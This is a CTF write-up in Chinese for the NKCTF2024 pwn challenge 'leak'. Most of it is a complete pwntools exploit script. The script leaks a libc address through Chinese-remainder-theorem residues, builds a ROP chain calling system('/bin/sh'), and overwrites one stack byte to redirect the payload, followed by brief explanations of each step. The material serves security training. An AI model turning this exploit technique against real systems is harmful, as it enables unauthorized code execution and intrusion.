[NKCTF2024]-PWN:leak解析(中国剩余定理泄露libc地址,汇编覆盖返回地址)

查看保护

查看ida

先放exp

完整exp:

复制代码
from pwn import*
from sympy.ntheory.modular import crt
context(log_level='debug',arch='amd64')

while True:
    p=process('./leak')
    ps=[101,103,107,109,113,127]
    p.sendafter(b'secret\n',bytes(ps))
    cs=[0]*6
    for i in range(6):
        cs[i]=u32(p.recv(1).ljust(4,b'\x00'))
    print(hex(cs[i]))
    onestack=u32(p.recv(1).ljust(4,b'\x00'))
    if onestack+0x58>0xff:
        p.close()
        continue
    print("onestack"+hex(onestack))
    res=crt(ps,cs)[0]
    n=1
    for i in range(0,6):
        n*=ps[i]
    c=0
    stdout=0
    while True:
        stdout=res+c*n
        if (stdout>>44)==0x07:
            if (stdout&0xfff)==0x780:
                break
        c+=1
        assert c<100
    libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    libcbase=stdout-libc.sym['_IO_2_1_stdout_']
    ret=libcbase+0x29139
    pop_rdi=libcbase+0x2a3e5
    system=libcbase+libc.sym['system']
    binsh=libcbase+next(libc.search(b'/bin/sh'))
    payload=p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p8((onestack+0x58)&0xff)
    p.send(payload)
    #p.send(b'aa')

    p.interactive()
    break

#解释点1:这里是接收程序输出的六次结果来解中国剩余定理来算出stdout的地址,算出libc基地址。

#解释点2:这里最后覆盖一个字节的栈地址是为了把payload全覆盖到返回地址上去。这个是从汇编指令上看的

这里把地址移动到rcx之后就以rcx内的值来确定移动位置,因为rbp+buf的位置存的是栈上地址,如果我们把最后一个字节覆盖掉就可以控制rcx的值,从而控制payload移动的位置,执行getshell。

相关推荐
qcx238 小时前
SpaCellAgent:用 LLM 多智能体怎么用于单细胞轨迹分析的?效率提升了多少?
人工智能·gpt·安全·ai·机器人·llm·agent
味悲9 小时前
SQL注入从入门到实战
数据库·sql·安全
QYR-分析19 小时前
机器人安全控制器行业高速扩容 本土替代迎来全新发展窗口期
人工智能·安全·机器人
IpdataCloud19 小时前
担心IP暴露隐私?用安全IP查询工具自查,三步配置网络出口
网络·tcp/ip·安全·ip
零零信安1 天前
AI智能体,攻守失衡的催化剂 | 零零信安
人工智能·网络安全·数据泄露·暗网·零零信安
JerrySir1 天前
恶意 npm 包只活了 17 分钟:技术面试里,为什么“升级依赖”还不算止血?
javascript·安全
白帽小阳1 天前
2026前端面试题!(附答案及解析)
javascript·网络·python·安全·web安全·网络安全·护网行动
xd1855785551 天前
电影匹配引擎-基于鸿蒙的心情电影推荐应用开发实践
人工智能·安全·华为·harmonyos·鸿蒙
白帽小阳1 天前
[特殊字符]【2026最新】零基础入门学网络安全(详细路线图),看这篇就够了!
学习·安全·web安全·网络安全·安全运营·学习路线·web渗透
qetfw1 天前
CentOS 7 配置 iptables 防火墙
安全